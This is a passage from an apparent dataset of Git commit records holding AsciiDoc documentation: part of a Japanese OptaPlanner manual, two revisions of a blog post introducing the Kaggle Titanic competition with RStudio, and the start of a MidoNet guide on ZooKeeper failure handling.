\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u6301\u3063\u3066\u3044\u306a\u3044\u5834\u5408\u3084\u3001\u30ed\u30fc\u30ab\u30eb\u306e Git \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u8a2d\u5b9a\u304c\u305d\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u306a\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f\u3001\u4ee3\u308f\u308a\u306b\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u8a8d\u8a3c\u554f\u984c\u3092\u56de\u907f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n----\n$ git clone https:\/\/github.com\/droolsjbpm\/optaplanner.git optaplanner\n...\n----\n****\n\n{empty}2. link:http:\/\/maven.apache.org\/[Maven] \u3092\u4f7f\u3063\u3066\u30d3\u30eb\u30c9\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner\n$ mvn clean install -DskipTests\n...\n----\n\n.\u6ce8\u610f\n****\nMaven \u306e\u521d\u56de\u306f\u3001jar \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b\u305f\u3081\u3001\u6642\u9593\u304c\u304b\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n****\n\n{empty}3. \u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner-examples\n$ mvn exec:exec\n...\n----\n\n{empty}4. \u597d\u307f\u306e IDE \u3067\u30bd\u30fc\u30b9\u3092\u7de8\u96c6\u3057\u307e\u3059\u3002\n\n{empty}5. \u30aa\u30d7\u30b7\u30e7\u30f3: Java \u30d7\u30ed\u30d5\u30a1\u30a4\u30e9\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\n\n\n\n[[governance]]\n== 1.5. \u7ba1\u7406\u30fb\u904b\u55b6\n\n[[statusOfOptaPlanner]]\n=== 1.5.1. 
OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055\n\nOptaPlanner \u304c\u6301\u3064\u7279\u9577:\n\n* *\u5b89\u5b9a\u6027*: \u30e6\u30cb\u30c3\u30c8\u3054\u3068\u306e\u30c6\u30b9\u30c8, \u7d71\u5408\u74b0\u5883\u3067\u306e\u30c6\u30b9\u30c8, \u30b9\u30c8\u30ec\u30b9\u30c6\u30b9\u30c8\u306b\u3088\u3063\u3066\u975e\u5e38\u306b\u3088\u304f\u30c6\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u4fe1\u983c\u6027*: \u4e16\u754c\u4e2d\u3067\u3001\u88fd\u54c1\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u30b9\u30b1\u30fc\u30e9\u30d3\u30ea\u30c6\u30a3*: \u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3067\u306f\u300150000 \u500b\u306e\u5909\u6570\u304c\u6271\u308f\u308c\u3001\u305d\u306e 5000 \u500b\u3054\u3068\u306b\u3001\u8907\u6570\u306e\u7a2e\u985e\u306e\u5236\u7d04\u3068\u305d\u308c\u3092\u6e80\u305f\u3059\u4f55\u5104\u3082\u306e\u30d1\u30bf\u30fc\u30f3\u304c\u6271\u308f\u308c\u3066\u3044\u308b\u3002\n* *\u6574\u5099\u3055\u308c\u305f\u6587\u66f8*: \u8a73\u7d30\u306a\u672c\u30de\u30cb\u30e5\u30a2\u30eb\u3084\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3092\u898b\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[backwardsCompatibility]]\n=== 1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027\n\nOptaPlanner \u3067\u306f\u3001API \u3068\u5b9f\u88c5\u304c\u5206\u96e2\u3055\u308c\u307e\u3059\u3002\n\n* *\u30d1\u30d6\u30ea\u30c3\u30af API:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.api*+ \u306f\u3001\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001100% \u306e\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002\n* *Impl \u30af\u30e9\u30b9:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.impl*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e\u30af\u30e9\u30b9\u306b\u306f\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u304c\u3042\u308a\u307e\u305b\u3093\u3002\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u5909\u66f4\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002link:https:\/\/github.com\/droolsjbpm\/optaplanner\/blob\/master\/optaplanner-distribution\/src\/main\/assembly\/filtered-resources\/UpgradeFromPreviousVersionRecipe.txt[UpgradeFromPreviousVersionRecipe.txt]\u3068\u547c\u3070\u308c\u308b\u30ec\u30b7\u30d4\u306b\u306f\u3001\u65b0\u3057\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3059\u308b\u5834\u5408\u306e\u3001\u5404\u5909\u66f4\u5185\u5bb9\u304a\u3088\u3073\u305d\u306e\u5909\u66f4\u306b\u3059\u3070\u3084\u304f\u5bfe\u51e6\u3059\u308b\u65b9\u6cd5\u304c\u8a18\u8ff0\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n* *XML \u8a2d\u5b9a:* XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u975e\u30d1\u30d6\u30ea\u30c3\u30af API \u30af\u30e9\u30b9\u3092\u4f7f\u7528\u3059\u308b\u5fc5\u8981\u306e\u3042\u308b\u8981\u7d20\u3092\u9664\u304f\u3059\u3079\u3066\u306e\u8981\u7d20\u306b\u3064\u3044\u3066\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.config*+ \u306b\u3042\u308b\u30af\u30e9\u30b9\u306b\u3088\u3063\u3066\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\n\n.\u6ce8\u610f\n****\n\u672c\u8aac\u660e\u66f8\u3067\u306f\u3001impl \u30af\u30e9\u30b9\u3082\u3044\u304f\u3064\u304b\u6271\u308f\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u308c\u3089\u6587\u66f8\u5316\u3055\u308c\u305f impl 
\u30af\u30e9\u30b9\u306f\u3001(\u672c\u8aac\u660e\u66f8\u3067\u5b9f\u9a13\u7684\u306a\u3082\u306e\u3060\u3068\u660e\u8a18\u3055\u308c\u306a\u3044\u9650\u308a) \u4fe1\u983c\u6027\u304c\u3042\u308a\u3001\u5b89\u5168\u306b\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u305d\u308c\u3089\u306f\u3001\u78ba\u5b9a\u7684\u306b\u8a18\u8ff0\u3059\u308b\u306b\u306f\u307e\u3060\u6642\u671f\u5c1a\u65e9\u306a\u3082\u306e\u3060\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150915 Takugo\nSource: we're just not entirely comfortable yet to write their signatures in stone\nInterpreted as: the impl classes are still subject to changes. \n\/\/\/\/\n****\n\n\n\n[[communityAndSupport]]\n=== 1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8\n\n\u30cb\u30e5\u30fc\u30b9\u3084\u8a18\u4e8b\u306f\u3001link:https:\/\/www.optaplanner.org\/blog\/[\u79c1\u305f\u3061\u306e\u30d6\u30ed\u30b0] \u3084 Google+ (link:https:\/\/plus.google.com\/\\+OptaPlannerOrg[OptaPlanner], link:https:\/\/plus.google.com\/\\+GeoffreyDeSmet[Geoffrey De Smet])\u3001Twitter (link:https:\/\/twitter.com\/OptaPlanner[OptaPlanner], link:https:\/\/twitter.com\/GeoffreyDeSmet[Geoffrey De Smet]) \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002*OptaPlanner \u304c\u5f79\u306b\u7acb\u3063\u305f\u5834\u5408\u306b\u306f\u3001\u305d\u306e\u3053\u3068\u306b\u3064\u3044\u3066\u30d6\u30ed\u30b0\u306b\u66f8\u3044\u305f\u308a Twitter \u3067\u3064\u3076\u3084\u3044\u305f\u308a\u3057\u3066\u3001\u79c1\u305f\u3061\u3092\u3054\u652f\u63f4\u304f\u3060\u3055\u3044\uff01*\n\nlink:https:\/\/www.optaplanner.org\/community\/forum.html[\u79c1\u305f\u3061\u306e\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30fc\u306e\u516c\u958b\u30d5\u30a9\u30fc\u30e9\u30e0]\u3067\u306e\u8cea\u554f\u3084link:https:\/\/issues.jboss.org\/browse\/PLANNER[\u8ab2\u984c\u30c8\u30e9\u30c3\u30ab\u30fc]\u3067\u306e\u30d0\u30b0\u5831\u544a\u3001\u6a5f\u80fd\u8981\u671b\u3092\u6b53\u8fce\u3057\u307e\u3059\u3002GitHub \u3078\u306e pull \u8981\u6c42\u3092\u5927\u3044\u306b\u6b53\u8fce\u3057\u3001\u512a\u5148\u7684\u306b\u6271\u3044\u307e\u3059\uff01\u3054\u81ea\u8eab\u306e\u6539\u5584\u3092\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u5316\u3059\u308c\u3070\u3001\u305d\u308c\u306b\u5bfe\u3057\u3066\u79c1\u305f\u3061\u304c\u52a0\u3048\u308b\u5c02\u9580\u7684\u306a\u30c1\u30a7\u30c3\u30af\u3084\u3055\u3089\u306a\u308b\u6539\u826f\u3092\u3054\u81ea\u8eab\u306e\u305f\u3081\u306b\u5f79\u7acb\u3066\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\nRed Hat \u306f\u3001\u4e2d\u6838\u3068\u306a\u308b\u30c1\u30fc\u30e0\u3092\u96c7\u7528\u3059\u308b\u5f62\u3067\u3001OptaPlanner \u306e\u5c55\u958b\u3092\u5f8c\u63f4\u3057\u3066\u3044\u307e\u3059\u3002\u4f01\u696d\u5411\u3051\u306e\u30b5\u30dd\u30fc\u30c8\u3084\u30b3\u30f3\u30b5\u30eb\u30c6\u30a3\u30f3\u30b0\u306b\u3064\u3044\u3066\u306f\u3001link:https:\/\/www.optaplanner.org\/community\/product.html[BRMS \u304a\u3088\u3073 BPMS \u88fd\u54c1] (\u542b OptaPlanner) \u3092\u53c2\u7167\u3059\u308b\u304b\u3001link:http:\/\/www.redhat.com\/en\/about\/contact\/sales[Red Hat \u3078\u304a\u554f\u3044\u5408\u308f\u305b]\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[relationshipWithKie]]\n=== 1.5.4. 
Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2\n\nOptaPlanner \u306f\u3001link:https:\/\/www.kiegroup.org\/[KIE \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30fb\u30b0\u30eb\u30fc\u30d7]\u306e\u4e00\u90e8\u3067\u3059\u3002KIE \u30b0\u30eb\u30fc\u30d7\u306f\u3001link:https:\/\/www.drools.org\/[Drools] \u30eb\u30fc\u30eb\u30a8\u30f3\u30b8\u30f3\u3068 link:https:\/\/www.jbpm.org\/[jBPM] \u30ef\u30fc\u30af\u30d5\u30ed\u30fc\u30a8\u30f3\u30b8\u30f3\u3068\u3068\u3082\u306b\u3001\u5b9a\u671f\u7684\u306b (\u901a\u5e38 1\u301c2 \u56de\/\u6708) \u30ea\u30ea\u30fc\u30b9\u3055\u308c\u307e\u3059\u3002\n\/\/\/\/\n150916 Takugo\nSource: It releases regularly\nInterpreted as: The KIE group is released regularly\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/kieFunctionalityOverview.png[]\n\nDrools \u3092\u7528\u3044\u305f\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u7d71\u5408\u306b\u3064\u3044\u3066\u3088\u308a\u591a\u304f\u77e5\u308b\u306b\u306f\u3001link:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/index.html#architectureOverview[\u69cb\u9020\u306e\u6982\u8981]\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ee3cc9e6b39b4b16f717ad348c27c18fb12a708","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n:icons: image\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. 
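For instance, the submission file for this competition is just a two-column CSV pairing each test-set PassengerId with a predicted Survived value. A minimal sketch in R (the data frame +test+ and the 0\/1 prediction vector +pred+ are hypothetical names standing in for your own objects):\n\n[source,r]\n----\n# Build the submission data frame: one row per test passenger,\n# pairing each PassengerId with its predicted Survived value (0 or 1).\nsubmission <- data.frame(PassengerId = test$PassengerId, Survived = pred)\n\n# Kaggle expects a plain CSV with a header row and no row names.\nwrite.csv(submission, file = \"titanic_submission.csv\", row.names = FALSE)\n----\n\n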
As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n[cols=\"1, 8a\"]\n|===\n|image:\/images\/icons\/tip.png[icon=\"tip\",size=\"4x\",width=56]\n|*Data Science Perspective*\n\nWe need to use the provided attributes (variables) to train a predictive model, but how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n * maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n\n * minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n|===\n\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n\/\/[[app-listing]]\n\/\/[source,ruby]\n\/\/.test.ruby\n\/\/----\n\/\/----\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n:icons: image\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate is by entering data science competitions. 
Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n[cols=\"2*\"]\n|===\n|image:\/images\/icons\/tip.png[icon=\"tip\",size=\"4x\",width=56]\n|*Data Science Perspective*\n\n|\n|We need to use the provided attributes (variables) to train a predictive model, but how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n|===\n\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. 
Part 4: Conclusion\n\n\/\/[[app-listing]]\n\/\/[source,ruby]\n\/\/.test.ruby\n\/\/----\n\/\/----\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e76c5550d18ec1d1a9672b52b075e29d3b4aae34","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Kaggle: Learning from Titanic\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scientists and want to dip our toes into the water. How do we get started using link:http:\/\/rmarkdown.rstudio.com\/[RStudio]? We dive into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic Starting \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. To participate, you may enter data science competitions. Kaggle provides two datasets for the Titanic competition containing passenger attributes:\n\n* a training set, complete with the outcome (target) variable for training our predictive model.\n* a test set, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model, we then enter the submission file to Kaggle for evaluation.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Think like a Data Scientist*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, but how does that work? \n\n- Some variables are correlated with each other. When those variables vary, the other variables will also vary to some degree.\n- We need to maximize the number of explanatory variables: those that are correlated with the outcome variable and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Quick History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. There were approximately 2200 passengers and crew aboard. 
\n\n== Quick History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. There were approximately 2,200 passengers and crew aboard.\n\nOf the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n\n\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Kaggle: Learning from Titanic\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scienctists and want to dip our toes into the the water. How do we get started using link:http:\/\/rmarkdown.rstudio.com\/[RStudio]? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic Starting \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. To participate, you may enter data science competitions. Kaggle provides two datasets for the Titanic competition containing passenger attributes:\n\n* a training set, complete with the outcome (target) variable for training our predictive model.\n* a test set, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model, we then enter the submission file to Kaggle for evaluation.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Think like a Data Scientist*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, but how does that work? \n\n- Some variables are correlated with each other. When those variables vary, the other variables will also vary to some degree\n- We need to maximize the number of explanatory variables: those that are correlated with the outcome variable and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[Multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Quick History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage enroute to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. There were approximately 2200 passengers and crew aboard.
\n\nOf the 1,317 passenger, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough life boats for about 1100 passengers, and more than 1500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f9d94d5fafb3d406f16e5dcb290bfdc5124568ce","subject":"OP Guide: Additions for ZK failure handling and maintenance","message":"OP Guide: Additions for ZK failure handling and maintenance\n\nChange-Id: I7754bbda02d46ee812b4f81367aeef416ee38d89\nRef: https:\/\/midonet.atlassian.net\/browse\/MND-202\nSigned-off-by: Jan Hilberath <14e793d896ddc8ca6911747228e86464cf420065@midokura.com>\n","repos":"midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs","old_file":"docs\/operation-guide\/src\/advanced\/section_midolman_configuration_en.adoc","new_file":"docs\/operation-guide\/src\/advanced\/section_midolman_configuration_en.adoc","new_contents":"[[midolman_configuration_options]]\n= MidoNet Agent (Midolman) configuration options\n\nThis section covers all configuration options for the MidoNet Agent.\n\nWe don't recommend making changes to the default values, except possibly the\n+zookeeper.session_gracetime+ and +agent.datapath.send_buffer_pool_buf_size_kb+\nsetting values.\n\n[WARNING]\nDo not modify the root key, cluster name, or keyspace unless you know what you\nare doing.\n\n++++\n<?dbhtml stop-chunking?>\n++++\n\n== MidoNet behavior after ZooKeeper cluster failure\n\nNodes running the MidoNet Agent, Midolman, depend on a live ZooKeeper session to\nload pieces of a virtual network topology on-demand and watch for updates to\nthose virtual devices.\n\nWhen ZooKeeper becomes inaccessible, a MidoNet Agent instance will continue\noperating for as long as there's a chance to recover connectivity while keeping\nthe same ZooKeeper session. The amount of operating time is thus dictated by the\nsession timeout, which you can control by editing the zookeeper\nsession_gracetime setting in mn-conf(1).\n\nOnce the session expires, the MidoNet Agent will give up and shut itself down,\nprompting upstart to re-launch it. If the ZooKeeper connection and session are\nrecovered within the session_gracetime, MidoNet Agent operation will resume\nuneventfully. 
The MidoNet Agent will learn of all the updates that happened to\nthe virtual topology while it was disconnected and will update its internal\nstate and flow tables accordingly.\n\nWhile the MidoNet Agent is running disconnected from ZooKeeper, waiting for the\nsession to come back, traffic will still be processed, but with reduced\nfunctionality, as follows:\n\n* The MidoNet Agent will not see updates to the virtual topology, thus packets\nmay be processed with a version of the network topology that's up to\nsession_gracetime too old.\n\n* The MidoNet Agent will be unable to load new pieces of the network topology.\nPackets that traverse devices that had never been loaded on a particular MidoNet\nAgent will error out.\n\n* The MidoNet Agent will not be able to perform or see updates to Address\nResolution Protocol (ARP) tables and Media Access Control (MAC) learning tables.\n\nAs time passes, a disconnected MidoNet Agent will become less and less useful.\nThe trade-offs presented above are key to choosing a sensible session_gracetime\nvalue; the default is 30 seconds.\n\nZooKeeper connectivity is not an issue for the MidoNet API server. The API\nrequests are stateless and will simply fail when there is no ZooKeeper\nconnectivity.\n\n== ZooKeeper configuration\n\nYou may use the ZooKeeper configuration section in +mn-conf(1)+ to adjust:\n\n* the ZooKeeper session timeout value (in milliseconds). This value determines\nwhen the system considers the connection between ZooKeeper and the MidoNet Agent\nto be interrupted.\n\n* the session grace timeout value (in milliseconds). This value determines the\nperiod of time during which the Agent can reconnect to ZooKeeper without causing\nnode outage.\n\n* the root path for MidoNet data.\n\n[source]\n----\nzookeeper {\n zookeeper_hosts = <comma separated IPs>\n session_timeout = 30000\n root_key = \/midonet\/v1\n session_gracetime = 30000\n}\n----\n\n=== Considerations for network partitions and ZooKeeper failure and maintenance\n\nFor the MidoNet Agents that run at compute hosts or L2GW hosts, setting the\nsession gracetime is primarily dictated by tradeoffs between 